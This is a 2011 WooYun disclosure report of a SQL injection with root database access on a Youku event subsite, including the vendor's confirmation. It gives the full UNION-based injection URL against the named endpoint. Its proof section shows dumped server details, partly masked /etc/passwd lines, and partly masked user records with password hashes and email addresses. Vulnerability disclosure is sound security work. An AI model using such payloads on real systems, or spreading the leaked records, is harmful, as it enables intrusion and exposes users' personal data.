漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-01823
漏洞标题:优酷某分站存在Injection root权限
相关厂商:优酷
漏洞作者: 孤狐浪子
提交时间:2011-04-05 18:05
修复时间:2011-05-05 21:00
公开时间:2011-05-05 21:00
漏洞类型:网络敏感信息泄漏
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-04-05: 细节已通知厂商并且等待厂商处理中
2011-04-05: 厂商已经确认,细节仅向厂商公开
2011-04-15: 细节向核心白帽子及相关领域专家公开
2011-04-25: 细节向普通白帽子公开
2011-05-05: 细节向实习白帽子公开
2011-05-05: 细节向公众公开
简要描述:
优酷视频分站Sql注射漏洞,爆出数据库结构, 主机相关信息,导致信息泄漏,导致大量用户信息泄漏。非常之严重。管理速补。
详细说明:
http://event.youku.com/eleven/fendou/fendou_03.php?uid=3680&vid=XMTg2MTA2OTcy%27 And 1=2 UNION all SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),@@VerSion_compile_Os,vErsioN(),uSer(),datAbase(),sysTem_user(),@@group_concat_max_len,@@dAtadir,@@tmpDir,@@baseDir) ,6 %23
漏洞证明:
=============================
Version:5.0.75-percona-highperf-b11-log
Version_OS:redhat-linux-gnu
User:root@192.168.1.14
DataBase:shanghai2
System_User:root@192.168.1.14
Current_User:root@%
====================================
oxt:x:0:0:root:/rooxx
xin:x:1:1:bin:/bin:/sxx
xxxxon:x:2:2:daemxxgin
adxx:x:3:4:adm:/var/adxxxn/nologin
lxx:x:4:7:lp:/var/spoxx
=========================================
5xxx|352xx0202|5a44fd5e3642xxx3762702|wwwxxx59xx39@qq.com
5xx2|45xxx2005|5a44fd5e3xxx433c3c489c53762702|wwxxx9067@qq.com
xx13|canxxxn789|0bc6xxx868da4cbfdbe70f96f|73xxx441@qq.com
=========================================
修复方案:
过滤
版权声明:转载请注明来源 孤狐浪子@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2011-04-05 18:09
厂商回复:
修复中
最新状态:
暂无